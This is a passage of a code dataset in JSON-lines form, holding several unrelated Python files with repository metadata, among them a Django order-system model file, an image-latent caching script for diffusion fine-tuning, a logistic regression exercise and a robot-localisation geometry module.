f\"list_{query_name}\": DjangoAutoConnectionField(node_cls=node_cls),\n }\n","repo_name":"JoaRiski/django-simple-graphql","sub_path":"simple_graphql/django/schema/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38313442335","text":"#!/usr/bin/env python3\nimport psycopg2\nimport sys\nimport matplotlib.pyplot as 
plt\n\n\nSQL_SELECT_POPULARITY = \"\"\"\nwith blocks_places as (select distinct pxca.id_place, cb.id_block from carnival_block cb \njoin carnival_block_route cbr on cbr.id_block = cb.id_block\njoin placexcarnival_address pxca on pxca.id_address = cbr.id_address\n),\ntt_block as (select cb.id_block, count(txs.id_tweet) as ctt from carnival_block cb\njoin tweet_search_control tsc on tsc.id_block = cb.id_block\njoin tweetxsearch txs on txs.id_search = tsc.id_search\ngroup by 1 \norder by 2 desc)\n\nselect bp.id_block, c.\"name\", c.\"date\", coalesce(tt.ctt, 0), count (r.stars) as c, avg(r.stars), \n((count(r.stars)::decimal/2537) * (avg(r.stars)/5) + \n(((coalesce(tt.ctt::decimal, 0) ) / 5805)))/2 as popularidade\nfrom blocks_places bp\njoin review r on r.id_place = bp.id_place\njoin carnival_block c on c.id_block = bp.id_block\nleft join tt_block tt on tt.id_block = c.id_block\ngroup by bp.id_block, c.\"name\", c.\"date\", tt.ctt\norder by popularidade desc\n\"\"\"\n\ncon = psycopg2.connect(host='localhost', port=25432, database='mob',\n user='mob', password='mob')\ncursor = con.cursor()\n\ncursor.execute(SQL_SELECT_POPULARITY)\npopularity = cursor.fetchall()\n\nx = []\nx_google = []\nx_twitter = []\n\ny = []\ny_google = []\ny_twitter = []\n\ncount = []\n\nfor p in popularity:\n # if p[-1] < 0.2:\n x.append(p[3] + p[4])\n x_google.append(p[4])\n x_twitter.append(p[3])\n\n y.append(p[-1])\n y_google.append(((p[4]/2537) * (float(p[5])/5)))\n y_twitter.append((p[3]/5805))\n #else:\n # count.append(p[-1])\n\n#plt.hist(count, bins=3)\nfig, ax = plt.subplots()\nax.scatter(x, y, label='Twitter e Google Review')\nax.scatter(x_google, y_google, label=\"Google Review\")\nax.scatter(x_twitter, y_twitter, label=\"Twitter\")\n\nax.set_xlabel(r'interações em redes sociais')\nax.set_ylabel(r'popularidade')\nax.set_title('Popularidade e interações Twitter/Google Review')\n\nplt.legend();\n\nplt.show()\n","repo_name":"Pongelupe/mobility-studies","sub_path":"google_places_searcher/review_spider/user_review/scatter_popularity.py","file_name":"scatter_popularity.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"35562384718","text":"import argparse\nimport os\nimport json\n\nfrom tqdm import tqdm\nimport numpy as np\nfrom PIL import Image\nimport cv2\nimport torch\nfrom torchvision import transforms\n\nimport library.model_util as model_util\nimport library.train_util as train_util\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nIMAGE_TRANSFORMS = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5]),\n ]\n)\n\n\ndef collate_fn_remove_corrupted(batch):\n \"\"\"Collate function that allows to remove corrupted examples in the\n dataloader. 
It expects that the dataloader returns 'None' when that occurs.\n The 'None's in the batch are removed.\n \"\"\"\n # Filter out all the Nones (corrupted examples)\n batch = list(filter(lambda x: x is not None, batch))\n return batch\n\n\ndef get_latents(vae, images, weight_dtype):\n img_tensors = [IMAGE_TRANSFORMS(image) for image in images]\n img_tensors = torch.stack(img_tensors)\n img_tensors = img_tensors.to(DEVICE, weight_dtype)\n with torch.no_grad():\n latents = vae.encode(img_tensors).latent_dist.sample().float().to(\"cpu\").numpy()\n return latents\n\n\ndef get_npz_filename_wo_ext(data_dir, image_key, is_full_path, flip):\n if is_full_path:\n base_name = os.path.splitext(os.path.basename(image_key))[0]\n else:\n base_name = image_key\n if flip:\n base_name += '_flip'\n return os.path.join(data_dir, base_name)\n\n\ndef main(args):\n image_paths = train_util.glob_images(args.train_data_dir)\n print(f\"found {len(image_paths)} images.\")\n\n if os.path.exists(args.in_json):\n print(f\"loading existing metadata: {args.in_json}\")\n with open(args.in_json, \"rt\", encoding='utf-8') as f:\n metadata = json.load(f)\n else:\n print(f\"no metadata / メタデータファイルがありません: {args.in_json}\")\n return\n\n weight_dtype = torch.float32\n if args.mixed_precision == \"fp16\":\n weight_dtype = torch.float16\n elif args.mixed_precision == \"bf16\":\n weight_dtype = torch.bfloat16\n\n vae = model_util.load_vae(args.model_name_or_path, weight_dtype)\n vae.eval()\n vae.to(DEVICE, dtype=weight_dtype)\n\n # bucketのサイズを計算する\n max_reso = tuple([int(t) for t in args.max_resolution.split(',')])\n assert len(max_reso) == 2, f\"illegal resolution (not 'width,height') / 画像サイズに誤りがあります。'幅,高さ'で指定してください: {args.max_resolution}\"\n\n bucket_resos, bucket_aspect_ratios = model_util.make_bucket_resolutions(\n max_reso, args.min_bucket_reso, args.max_bucket_reso)\n\n # 画像をひとつずつ適切なbucketに割り当てながらlatentを計算する\n bucket_aspect_ratios = np.array(bucket_aspect_ratios)\n buckets_imgs = [[] for _ in range(len(bucket_resos))]\n bucket_counts = [0 for _ in range(len(bucket_resos))]\n img_ar_errors = []\n\n def process_batch(is_last):\n for j in range(len(buckets_imgs)):\n bucket = buckets_imgs[j]\n if (is_last and len(bucket) > 0) or len(bucket) >= args.batch_size:\n latents = get_latents(vae, [img for _, _, img in bucket], weight_dtype)\n\n for (image_key, _, _), latent in zip(bucket, latents):\n npz_file_name = get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, False)\n np.savez(npz_file_name, latent)\n\n # flip\n if args.flip_aug:\n latents = get_latents(vae, [img[:, ::-1].copy() for _, _, img in bucket], weight_dtype) # copyがないとTensor変換できない\n\n for (image_key, _, _), latent in zip(bucket, latents):\n npz_file_name = get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, True)\n np.savez(npz_file_name, latent)\n\n bucket.clear()\n\n # 読み込みの高速化のためにDataLoaderを使うオプション\n if args.max_data_loader_n_workers is not None:\n dataset = train_util.ImageLoadingDataset(image_paths)\n data = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=False,\n num_workers=args.max_data_loader_n_workers, collate_fn=collate_fn_remove_corrupted, drop_last=False)\n else:\n data = [[(None, ip)] for ip in image_paths]\n\n for data_entry in tqdm(data, smoothing=0.0):\n if data_entry[0] is None:\n continue\n\n img_tensor, image_path = data_entry[0]\n if img_tensor is not None:\n image = transforms.functional.to_pil_image(img_tensor)\n else:\n try:\n image = Image.open(image_path)\n if image.mode != 'RGB':\n image = 
image.convert(\"RGB\")\n except Exception as e:\n print(f\"Could not load image path / 画像を読み込めません: {image_path}, error: {e}\")\n continue\n\n image_key = image_path if args.full_path else os.path.splitext(os.path.basename(image_path))[0]\n if image_key not in metadata:\n metadata[image_key] = {}\n\n # 本当はこの部分もDataSetに持っていけば高速化できるがいろいろ大変\n aspect_ratio = image.width / image.height\n ar_errors = bucket_aspect_ratios - aspect_ratio\n bucket_id = np.abs(ar_errors).argmin()\n reso = bucket_resos[bucket_id]\n ar_error = ar_errors[bucket_id]\n img_ar_errors.append(abs(ar_error))\n\n # どのサイズにリサイズするか→トリミングする方向で\n if ar_error <= 0: # 横が長い→縦を合わせる\n scale = reso[1] / image.height\n else:\n scale = reso[0] / image.width\n\n resized_size = (int(image.width * scale + .5), int(image.height * scale + .5))\n\n # print(image.width, image.height, bucket_id, bucket_resos[bucket_id], ar_errors[bucket_id], resized_size,\n # bucket_resos[bucket_id][0] - resized_size[0], bucket_resos[bucket_id][1] - resized_size[1])\n\n assert resized_size[0] == reso[0] or resized_size[1] == reso[\n 1], f\"internal error, resized size not match: {reso}, {resized_size}, {image.width}, {image.height}\"\n assert resized_size[0] >= reso[0] and resized_size[1] >= reso[\n 1], f\"internal error, resized size too small: {reso}, {resized_size}, {image.width}, {image.height}\"\n\n # 既に存在するファイルがあればshapeを確認して同じならskipする\n if args.skip_existing:\n npz_files = [get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, False) + \".npz\"]\n if args.flip_aug:\n npz_files.append(get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, True) + \".npz\")\n\n found = True\n for npz_file in npz_files:\n if not os.path.exists(npz_file):\n found = False\n break\n\n dat = np.load(npz_file)['arr_0']\n if dat.shape[1] != reso[1] // 8 or dat.shape[2] != reso[0] // 8: # latentsのshapeを確認\n found = False\n break\n if found:\n continue\n\n # 画像をリサイズしてトリミングする\n # PILにinter_areaがないのでcv2で……\n image = np.array(image)\n image = cv2.resize(image, resized_size, interpolation=cv2.INTER_AREA)\n if resized_size[0] > reso[0]:\n trim_size = resized_size[0] - reso[0]\n image = image[:, trim_size//2:trim_size//2 + reso[0]]\n elif resized_size[1] > reso[1]:\n trim_size = resized_size[1] - reso[1]\n image = image[trim_size//2:trim_size//2 + reso[1]]\n assert image.shape[0] == reso[1] and image.shape[1] == reso[0], f\"internal error, illegal trimmed size: {image.shape}, {reso}\"\n\n # # debug\n # cv2.imwrite(f\"r:\\\\test\\\\img_{i:05d}.jpg\", image[:, :, ::-1])\n\n # バッチへ追加\n buckets_imgs[bucket_id].append((image_key, reso, image))\n bucket_counts[bucket_id] += 1\n metadata[image_key]['train_resolution'] = reso\n\n # バッチを推論するか判定して推論する\n process_batch(False)\n\n # 残りを処理する\n process_batch(True)\n\n for i, (reso, count) in enumerate(zip(bucket_resos, bucket_counts)):\n print(f\"bucket {i} {reso}: {count}\")\n img_ar_errors = np.array(img_ar_errors)\n print(f\"mean ar error: {np.mean(img_ar_errors)}\")\n\n # metadataを書き出して終わり\n print(f\"writing metadata: {args.out_json}\")\n with open(args.out_json, \"wt\", encoding='utf-8') as f:\n json.dump(metadata, f, indent=2)\n print(\"done!\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"train_data_dir\", type=str, help=\"directory for train images / 学習画像データのディレクトリ\")\n parser.add_argument(\"in_json\", type=str, help=\"metadata file to input / 読み込むメタデータファイル\")\n parser.add_argument(\"out_json\", type=str, help=\"metadata file to output / メタデータファイル書き出し先\")\n 
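# note: the positional argument below names the VAE checkpoint that model_util.load_vae uses to encode images into latents\n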
parser.add_argument(\"model_name_or_path\", type=str, help=\"model name or path to encode latents / latentを取得するためのモデル\")\n parser.add_argument(\"--v2\", action='store_true',\n help='not used (for backward compatibility) / 使用されません(互換性のため残してあります)')\n parser.add_argument(\"--batch_size\", type=int, default=1, help=\"batch size in inference / 推論時のバッチサイズ\")\n parser.add_argument(\"--max_data_loader_n_workers\", type=int, default=None,\n help=\"enable image reading by DataLoader with this number of workers (faster) / DataLoaderによる画像読み込みを有効にしてこのワーカー数を適用する(読み込みを高速化)\")\n parser.add_argument(\"--max_resolution\", type=str, default=\"512,512\",\n help=\"max resolution in fine tuning (width,height) / fine tuning時の最大画像サイズ 「幅,高さ」(使用メモリ量に関係します)\")\n parser.add_argument(\"--min_bucket_reso\", type=int, default=256, help=\"minimum resolution for buckets / bucketの最小解像度\")\n parser.add_argument(\"--max_bucket_reso\", type=int, default=1024, help=\"maximum resolution for buckets / bucketの最小解像度\")\n parser.add_argument(\"--mixed_precision\", type=str, default=\"no\",\n choices=[\"no\", \"fp16\", \"bf16\"], help=\"use mixed precision / 混合精度を使う場合、その精度\")\n parser.add_argument(\"--full_path\", action=\"store_true\",\n help=\"use full path as image-key in metadata (supports multiple directories) / メタデータで画像キーをフルパスにする(複数の学習画像ディレクトリに対応)\")\n parser.add_argument(\"--flip_aug\", action=\"store_true\",\n help=\"flip augmentation, save latents for flipped images / 左右反転した画像もlatentを取得、��存する\")\n parser.add_argument(\"--skip_existing\", action=\"store_true\",\n help=\"skip images if npz already exists (both normal and flipped exists if flip_aug is enabled) / npzが既に存在する画像をスキップする(flip_aug有効時は通常、反転の両方が存在する画像をスキップ)\")\n\n args = parser.parse_args()\n main(args)\n","repo_name":"egkv/kohya-trainer-v12","sub_path":"finetune/prepare_buckets_latents.py","file_name":"prepare_buckets_latents.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"2661766584","text":"\"\"\"\nThis file shall create the file which steers the creation of the frame folders later\nGiven the initial annotation file, the following steps are executed\n1) exclude unlabeled samples\n2) reduce to in scope classes since producing the frames for all classes takes too long\n3) exclude later frame, if two frames are annotated per video\n4) reduce duplicated records due to multiple bounding boxes or several actions per bounding box\n\"\"\"\nimport os\nimport pandas as pd\n\norig_annot = 'sdf/srv/beegfs02/scratch/da_action/data/kinetics700/ava-kinetics/ava_kinetics_v1_0/kinetics_val_v1.0.csv'\ntarget_steer = 'sdf/srv/beegfs02/scratch/da_action/data/kinetics700/csv_steer/10_cl_val_frames.csv'\n\n\nclasses = [80,79,74,11,17,14,59,1,8,49]\n\nkinetics_all = pd.read_csv(orig_annot, header=None, sep='\\n')\nkinetics_all = kinetics_all[0].str.split(',', expand=True)\nprint('initial length:', len(kinetics_all[0]))\n\n# 1) Drop None rows\nkinetics_all = kinetics_all.dropna(axis=0, how=\"any\")\nprint('after none:', len(kinetics_all[0]))\n\nkinetics_all[6] = kinetics_all[6].astype(int)\n\n# 2) Exclude not considered classes\nkinetics_all = kinetics_all.loc[kinetics_all[6].isin(classes)]\nprint('after classes:', len(kinetics_all[0]))\n\n# 3) Exclude duplicate frames per video\n# 4) reduce duplicate records due to multiple bounding boxes or several actions per bounding box\n# Create helper that does not contain duplicates considering first two columns\nkinetics_helper = 
kinetics_all.drop_duplicates(subset=[0,1], keep='first')\nkinetics_helper = kinetics_helper.drop_duplicates(subset=[0], keep='first')\n\n# Save the file needed to produce the kinetics frames\nkinetics_frames = kinetics_helper[[0,1]]\nprint('number of frames to save', len(kinetics_frames[0]))\nkinetics_frames.to_csv(target_steer, header=None, index=False, float_format='%.3f')\n\n\n# Produce the corresponding ground truth annotation file containing the annotations for all the saved frames\n\"\"\"\nframes = []\nfor index, row in kinetics_frames.iterrows():\n frames.append(kinetics_all.loc[(kinetics_all[0] == row[0]) & (kinetics_all[1] == row[1])])\n\nkinetics_gt = pd.concat(frames)\nprint('gt_list', len(kinetics_gt[0]))\n\nava_train_pred.to_csv(os.path.join(annot_dir, 'ava_train_predicted_boxes.csv'), header=None,\n # index=False, float_format='%.3f')\n\n\"\"\"\n","repo_name":"Rishabh-eth/action_detection","sub_path":"get_datasets/kinetics/01_csv_steer_keyframe.py","file_name":"01_csv_steer_keyframe.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33251572335","text":"import datetime\nfrom django.db import models\nfrom django.conf import settings\nfrom django.shortcuts import redirect, reverse\nfrom django.utils import timezone\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.utils.translation import gettext_lazy as _\nfrom djangoordersystem.managers import CustomUserManager\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom phonenumber_field.modelfields import PhoneNumberField\nfrom django.utils.text import slugify\n\n\n\n\nclass PaymentMethod(models.IntegerChoices):\n CASH = 1, \"Cash\"\n GCASH = 2, \"GCash\"\n\nclass CustomUser(AbstractBaseUser, PermissionsMixin):\n id = models.AutoField(primary_key=True)\n email = models.EmailField(_(\"email address\"), unique=True)\n picture = models.ImageField(\n upload_to='images/', blank=True, null=True, default='')\n is_staff = models.BooleanField(default=False)\n is_active = models.BooleanField(default=True)\n date_joined = models.DateTimeField(default=timezone.now)\n is_technician = models.BooleanField(default=False)\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = []\n\n objects = CustomUserManager()\n\n def __str__(self):\n return self.email\n\n class Meta:\n verbose_name = \"User\"\n\nclass UserProfile(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, blank=False)\n first_name = models.CharField(max_length=30, default='', blank=False)\n middle_name = models.CharField(max_length=30, default='')\n last_name = models.CharField(max_length=30, default='', blank=False)\n\n def __str__(self):\n return f'{self.first_name} {self.last_name}'\n\n\nclass TechnicianProfile(UserProfile):\n pass\n\nclass Service(models.Model):\n name = models.CharField(max_length=255)\n price = models.FloatField(default=0, validators=[MinValueValidator(0)])\n discounted_price = models.FloatField(\n default=0, validators=[MinValueValidator(0),])\n description = models.TextField(blank=True, null=True)\n thumbnail = models.ImageField(\n upload_to='images/', blank=True, null=True, default='')\n slug = models.SlugField()\n\n product_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def add_to_cart(self):\n return reverse('system:add-to-cart', kwargs={'slug': self.slug})\n\n def save(self, *args, **kwargs):\n self.slug = 
slugify(self.name)\n super(Service, self).save(*args, **kwargs)\n\nclass Status(models.IntegerChoices):\n PENDING = 1, \"Pending\"\n ON_THE_WAY = 2, \"On the way\"\n ONGOING = 3, \"Ongoing\"\n DONE = 4, \"Done\"\n\nclass Order(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)\n status = models.PositiveIntegerField(\n default=Status.PENDING, choices=Status.choices)\n order_started = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f\"{self.id}\"\n\n \n\ndef receipt_no_gen() -> str:\n today = datetime.date.today()\n today_string = today.strftime('%y%m%d')\n next_invoice_number = '01'\n last_invoice = OrderService.objects.filter(\n receipt_no__startswith=today_string).order_by('receipt_no').last()\n if last_invoice:\n last_invoice_number = int(last_invoice.receipt_no[6:])\n next_invoice_number = '{0:02d}'.format(last_invoice_number + 1)\n return today_string + next_invoice_number\n\n\nclass BillingInfo(models.Model):\n address = models.CharField(max_length=100)\n province = models.CharField(max_length=100)\n city = models.CharField(max_length=50)\n brgy = models.CharField(max_length=50)\n zip_code = models.PositiveBigIntegerField(blank=False, default=1234)\n\n def __str__(self):\n return self.address\n\n\nclass OrderService(models.Model):\n receipt_no = models.CharField(\n max_length=8, primary_key=True, default=receipt_no_gen)\n user = models.ForeignKey(CustomUser,\n on_delete=models.CASCADE)\n service = models.ForeignKey(Service, on_delete=models.CASCADE)\n billing_info = models.ForeignKey(BillingInfo, on_delete=models.CASCADE, null=True)\n order = models.ForeignKey(Order, on_delete=models.CASCADE)\n confirmed = models.BooleanField(default=False)\n quantity = models.IntegerField(default=1)\n\n added_on = models.DateTimeField(auto_now_add=True)\n paid = models.BooleanField(default=False)\n payment_method = models.PositiveIntegerField(\n default=PaymentMethod.CASH, choices=PaymentMethod.choices)\n\n scheduled_date = models.DateTimeField(auto_now_add=True)\n gcash_number = PhoneNumberField(region='PH', null=True)\n total_price = models.FloatField(\n validators=[MinValueValidator(0)], default=0)\n\n @property\n def price(self):\n if self.service.price:\n return self.service.price * self.quantity\n elif self.service.discounted_price:\n return self.service.discounted_price * self.quantity\n return 0\n\n def __str__(self):\n return self.receipt_no\n\n\nclass Task(models.Model):\n order = models.OneToOneField(OrderService, on_delete=models.CASCADE)\n technician = models.ForeignKey(TechnicianProfile, on_delete=models.CASCADE)\n date_assigned = models.DateTimeField(auto_now_add=True)\n date_finished = models.DateTimeField(null=True)\n \n class Meta:\n unique_together = ('order', 'technician')\n\n def __str__(self):\n return f'{self.order.receipt_no}-{self.technician}'\n\n def save(self, *args, **kwargs):\n if self.order.order.status == Status.DONE:\n self.date_finished = timezone.now()\n else:\n self.date_finished = None\n return super().save(*args, **kwargs)\n\n\nclass ServiceFeedback(models.Model):\n task = models.ForeignKey(Task, on_delete=models.SET_NULL, null=True)\n feedback = models.CharField(max_length=256, blank=False, default='')\n rating = models.IntegerField(default=0, validators=(MinValueValidator(0), MaxValueValidator(5)))\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return 
f'{self.task.order.receipt_no}-{self.task.technician}'","repo_name":"amiel-danao/green-cool-aircondition","sub_path":"system/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34586323438","text":"# Task 1:\n# The following program is written correctly, but it contains spots where errors can potentially occur.\n# Using the try construct, add handling of the corresponding exceptions to the code.\n# Example.\n# Original program:\ndef avg(a, b):\n    try:\n        result = (a * b) ** 0.5\n    except Exception as e:\n        result = None\n    return result\n\n\n\nprint(avg(5, 6))\nprint(avg([1, 2],2))\n\n\n\n\n# NOTE: To solve tasks 2-4 you need to get acquainted with the os and sys modules!\n# SEE: https://pythonworld.ru/moduli/modul-os.html, https://pythonworld.ru/moduli/modul-sys.html","repo_name":"Dinar1996/qaz","sub_path":"lesson6/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26958578271","text":"import torch\nimport numpy as np\n\nfrom pathlib import Path\nfrom typing import Dict, List, TypeVar, Union, Optional\n\nfrom torch import Tensor\n\nfrom config.config import CacheCfg\nfrom utils.util_types import TensorType\n\nEncodedInstance = TypeVar(\"EncodedInstance\")\n\nCONTEXT = {\n    \"device\": torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\"),\n    \"dtype\": torch.float32,\n}\n\n\nclass Cacher:\n    def __init__(self, cache_path: Path, tensor_type: TensorType):\n        mkdir_if_not_exist(cache_path)\n\n        self.path = cache_path\n        self.tensor_type = tensor_type\n        self.cached_ids = set(el.name for el in self.path.iterdir() if el.is_dir())\n\n    @staticmethod\n    def from_config(config: CacheCfg) -> \"Cacher\":\n        return Cacher(config.path, config.tensor_type)\n\n    def create_cache(self, hash: str, encoded_instance: Dict[str, EncodedInstance]) -> None:\n        instance_dir_path = self.path / hash\n        mkdir_if_not_exist(instance_dir_path)\n        tensor_dir_path = instance_dir_path / str(self.tensor_type.value)\n        mkdir_if_not_exist(tensor_dir_path)\n        self.write_tensors(tensor_dir_path / \"input_ids\", encoded_instance[\"input_ids\"])\n        self.write_tensors(tensor_dir_path / \"tensors\", encoded_instance[\"tensors\"])\n        self.write_original_tokens_ids(\n            instance_dir_path / \"original_tokens.txt\", encoded_instance[\"original_tokens\"]  # type: ignore\n        )\n        self.cached_ids = set(el.name for el in self.path.iterdir() if el.is_dir())\n\n    def get_from_cache(self, hash: str) -> Optional[Dict[str, EncodedInstance]]:\n        if hash not in self.cached_ids:\n            return None\n        instance_dir_path = self.path / hash\n        tensor_dir_path = instance_dir_path / str(self.tensor_type.value)\n        input_ids = self.load_tensor(tensor_dir_path / \"input_ids\")  # type: ignore\n        tensors = self.load_tensor(tensor_dir_path / \"tensors\")  # type: ignore\n        return {\n            \"input_ids\": input_ids.to(CONTEXT[\"device\"]) if isinstance(input_ids, torch.Tensor) else input_ids,\n            \"tensors\": tensors.to(CONTEXT[\"device\"]) if isinstance(tensors, torch.Tensor) else tensors,\n            \"original_tokens\": self.load_original_tokens_ids(instance_dir_path / \"original_tokens.txt\"),  # type: ignore\n        }\n\n    def write_tensors(self, path: Path, tensor: EncodedInstance) -> None:\n        if self.tensor_type == TensorType.torch:\n            torch.save(tensor, path.parent / (path.name + \".pt\"))\n        else:\n            raise Exception(\"Not implemented for this 
type of tensor...\")\n\n def load_tensor(self, path) -> EncodedInstance:\n if self.tensor_type == TensorType.torch:\n return torch.load(path.parent / (path.name + \".pt\"))\n else:\n raise Exception(\"Not implemented for this type of tensor...\")\n\n @staticmethod\n def write_original_tokens_ids(path: Path, token_ids: List[List[int]]) -> None:\n with open(path, \"w\") as f:\n for token in token_ids:\n f.write(\"%s\\n\" % \" \".join([str(t) for t in token]))\n\n @staticmethod\n def load_original_tokens_ids(path: Path) -> List[List[int]]:\n token_ids = []\n with open(path, \"r\") as f:\n for line in f.readlines():\n token_ids.append([int(val) for val in line.strip().split()])\n return token_ids\n\n\ndef mkdir_if_not_exist(path: Path) -> None:\n if not path.is_dir():\n path.mkdir()\n","repo_name":"sahanmar/orchid_legacy","sub_path":"data_processing/cacher.py","file_name":"cacher.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30350843187","text":"# Machine Learning Online Class - Exercise 2: Logistic Regression\n#\n# Instructions\n# ------------\n#\n# This file contains code that helps you get started on the second part\n# of the exercise which covers regularization with logistic regression.\n#\n# You will need to complete the following functions in this exercise:\n#\n# sigmoid.m\n# costFunction.m\n# predict.m\n# costFunctionReg.m\n#\n# For this exercise, you will not need to change any code in this file,\n# or any other files other than those mentioned above.\nimport copy\n\n# Initialization\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize as opt\n\nfrom plotData import plot_data\nfrom mapFeature import map_feature\nfrom costFunctionReg import cost_function_reg\nfrom drawBoundary import draw_boundary\nfrom predict import predict\n\nnp.random.seed(1)\n\n\n# Load Data\ndef main_reg():\n data = np.loadtxt('ex2data2.txt', delimiter=',')\n X = data[:, 0:2]\n y = data[:, 2]\n\n X_init = copy.deepcopy(X)\n\n plot_data(X, y)\n\n plt.show()\n\n # =========== Part 1: Regularized Logistic Regression ============\n # Add Polynomial Features\n\n # Note that mapFeature also adds a column of ones for us, so the intercept term is handled\n X = map_feature(X[:, 0], X[:, 1])\n\n # Initialize fitting parameters\n initial_theta = np.zeros(X.shape[1])\n\n # Set regularization parameter lambda to 1\n lambda_ = 1\n\n # Compute and display initial cost and gradient for regularized logistic regression\n cost, grad = cost_function_reg(initial_theta, X, y, lambda_)\n print(f'Cost at initial theta (zeros): {cost}')\n\n # ============= Part 2: Regularization and Accuracies =============\n # Optional Exercise: In this part, you will get\n # to try different values of lambda and see how regularization affects the decision boundary.\n # Try the following values of lambda (0, 1, 10, 100).\n\n # Initialize fitting parameters\n initial_theta = np.zeros(X.shape[1])\n\n # Set regularization parameter lambda to 1 (you should vary this)\n lambda_ = 10\n\n # Set Options\n options = {'maxfun': 400}\n\n # Optimize\n res = opt.minimize(cost_function_reg, initial_theta, args=(X, y, lambda_), jac=True, method='TNC', options=options)\n theta = res.x\n\n # Plot Boundary\n draw_boundary(theta, X_init, y)\n\n # Labels and Legend\n\n # Compute accuracy on our training set\n p = predict(theta, X)\n print(f'Train Accuracy: {np.mean(p == y) * 100}')\n\n\nif __name__ == '__main__':\n 
main_reg()\n","repo_name":"ruaruazero/MachineLearning2023","sub_path":"assignment/course4/exercise1/ex2_reg.py","file_name":"ex2_reg.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21828847959","text":"import logging\nimport math\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import List\n\nimport numpy as np\n\nimport reactives\nfrom geometry import two_points_90, pts_same_side, three_pts_angle, normalize_angle, midpoint, intersection, \\\n Point, line, parallel_line, distance\n\nROBOT_UNIT = 5 # cm\n# distance from robot's center (the two wheels' middle point) to it's tail (the red light)\n\nfound = reactives.Subject()\nnot_found = reactives.Subject()\n\n\n@dataclass\nclass ProcessedImg:\n img: np.ndarray\n blue_pts: List[tuple]\n red_pts: List[tuple]\n\n\n@dataclass\nclass Object:\n pos: Point\n angle: float\n dist: float\n\n\nclass NotFoundCase(Enum):\n UNDEF = 0\n MANY_POINTS = 1\n FEW_POINTS = 2\n\n\ndef find(processed_img: ProcessedImg):\n if (\n len(processed_img.blue_pts) != 2\n or\n len(processed_img.red_pts) != 1\n ):\n return _handle_not_found(processed_img.blue_pts, processed_img.red_pts)\n\n try:\n (height, width, _) = processed_img.img.shape\n robot = transform(\n wheel1=Point(*processed_img.blue_pts[0]),\n wheel2=Point(*processed_img.blue_pts[1]),\n tail=Point(*processed_img.red_pts[0]),\n scene_center=Point(width / 2, height / 2),\n )\n logging.info(\"Robot FOUND!!!\")\n logging.debug(\"Robot: %s\", robot)\n found.on_next((robot, processed_img))\n except Exception as e:\n logging.error(\"Error while transforming robot parameters.\", exc_info=e)\n not_found.on_next(NotFoundCase.UNDEF)\n\n\ndef transform(\n wheel1: Point,\n wheel2: Point,\n tail: Point,\n scene_center: Point,\n):\n \"\"\"\n :return: (\n robot_position, # position against scene center;\n angle, # angle against scene center;\n distance, # distance to scene center;\n )\n \"\"\"\n robot_center = midpoint(wheel1, wheel2)\n\n # finds the tail point's prime and its projection line - the main one\n tail_prime = two_points_90(wheel1, robot_center)\n intersection_line = line(wheel1, wheel2)\n if not pts_same_side(tail, tail_prime, intersection_line):\n tail_prime = two_points_90(wheel2, robot_center)\n main_projection_line = line(tail, tail_prime)\n\n # finds center line's prime\n center_line = line(scene_center, robot_center)\n side_line = line(tail, wheel1)\n side_intersection = intersection(center_line, side_line)\n if side_intersection:\n side_line_prime = line(tail_prime, wheel1)\n else:\n side_line = line(tail, wheel2)\n side_intersection = intersection(center_line, side_line)\n side_line_prime = line(tail_prime, wheel2)\n\n # noinspection PyTypeChecker\n side_intersection_projection_line = parallel_line(main_projection_line, side_intersection)\n side_intersection_prime = intersection(side_line_prime, side_intersection_projection_line)\n center_line_prime = line(robot_center, side_intersection_prime)\n\n # computes position, angle and distance\n center_line_projection = parallel_line(main_projection_line, scene_center)\n center_prime = intersection(center_line_projection, center_line_prime)\n dist = distance(center_prime, robot_center) / distance(robot_center, tail_prime)\n robot_position = robot_center - center_prime\n angle = math.degrees(normalize_angle(\n three_pts_angle(tail_prime, robot_center, center_prime) - math.pi))\n return Object(robot_position, angle, (dist * 
